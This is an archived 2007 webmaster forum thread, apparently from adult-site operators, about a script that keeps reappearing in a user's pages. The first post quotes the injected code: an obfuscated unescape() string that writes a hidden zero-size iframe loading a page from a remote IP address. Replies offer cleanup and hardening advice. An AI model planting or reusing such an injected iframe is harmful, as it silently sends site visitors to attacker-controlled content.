| Author |
Message |
bajarich
Joined: 16 Apr 2007
Posts: 28
Rank: 5
Location: Southern Pines, NC
|
 Posted: 22 Dec 2007 18:01 Post subject: Script Help Please |
 |
|
Hello,
I am not sure if this is the correct forum for this question, This script keeps showing up on my sites html at the bottom of the page.
<SCRIPT>
s=unescape("%3Ciframe%20src%3D%22http%3A//58.65.234.9/~momo/traffic/index.php%22%20WIDTH%3D%220%25%22%20HEIGHT%3D%220%25%22%20MARGINHEIGHT%3D%220%22%20MARGINWIDTH%3D%220%22%20SCROLLING%3D%22auto%22%20frameborder%3D%220%22%20NORESIZE%3E%3C/iframe%3E");document.writeln(s);document.close();
</SCRIPT>
I keep deleting it and in a few days it shows back up, I changed my FTP password figuring someone hacked into my server, but it showed up again. Any thoughts or ideas would be greatly appreciated.
Thanks,
_________________
Rich
http://www.imavoyeur.net
ICQ: 248752793
*************************** |
|
| Back to top |
|
bandit
Joined: 18 Dec 2006
Posts: 35
Location: Phantome Zone
|
| Posted: 22 Dec 2007 21:12 Post subject: |
|
|
Try to look for file named backup.php in folders on your server,if you have few sites there check them also. Delete it if it`s there.Change logins of your scripts.Check your other pages and delete script from there also
_________________
Teen Porn MGP
Pimp Traffic Trades
Best Teen Sponsor Ever |
|
| Back to top |
|
bajarich
Joined: 16 Apr 2007
Posts: 28
Rank: 5
Location: Southern Pines, NC
|
| Posted: 24 Dec 2007 00:37 Post subject: |
|
|
Thanks Bandit,
I found 3 more instances of this script on my other sites. I removed them and changed my password again. I did not find the php file you indicated though.
Thanks,
_________________
Rich
http://www.imavoyeur.net
ICQ: 248752793
*************************** |
|
| Back to top |
|
rhino
Joined: 23 Dec 2006
Posts: 70
Rank: 12
|
| Posted: 24 Dec 2007 07:12 Post subject: |
|
|
You might also want to set permissions on your toplist and TGP template
files to 644, and change all script and FTP passwords again (and use high
security passwords... Several popular scripts (Comus, Smart-Thumbs, Arrow
Trader) have been the target of hackers, and have released security oriented
updates so best advise there is to make sure your have the most recent script versions.
Probably wouldn't hurt to contact your host and make sure all O/S patches are current, as well as PHP and Zend.
Rhino |
|
| Back to top |
|
max
Joined: 18 Oct 2006
Posts: 538
Rank: 38
|
| Posted: 25 Dec 2007 16:10 Post subject: |
|
|
How it is possible to hack TGP or trade script?
Or it is hoster concerns? |
|
| Back to top |
|
rhino
Joined: 23 Dec 2006
Posts: 70
Rank: 12
|
| Posted: 26 Dec 2007 17:38 Post subject: |
|
|
Hi Max,
TGP and trade scripts can be hacked, through the script's admin with
password hurlers running dictionary and common user/pass attacks or
with direct exploitation of code in the TGP/trade scripts that allow the
hacker to install extra scripts on the target domain that add crap to the
TGP gallery pages or rewrite links.
Both the webmaster and host share responsibility for preventing this
crap... Harder to hack a site through a script exploit hosted on a server
that has current software (especially PHP and Zend), and good hosts stay
on top of server software updates.
First line of defense is the webmaster though - 1) keeping your TGP and
trade script software current so any potential exploit issuesidentified by
the script authors and patched are used, and 2) common sense with
user/password selection, file ownership, and file permissions. IMO theres
a point where the webmaster has to make a decision - ease of script
administration vs site and server security, and its different for each
webmaster.
Rhino |
|
| Back to top |
|
|
|
|
|
|
|
|
|
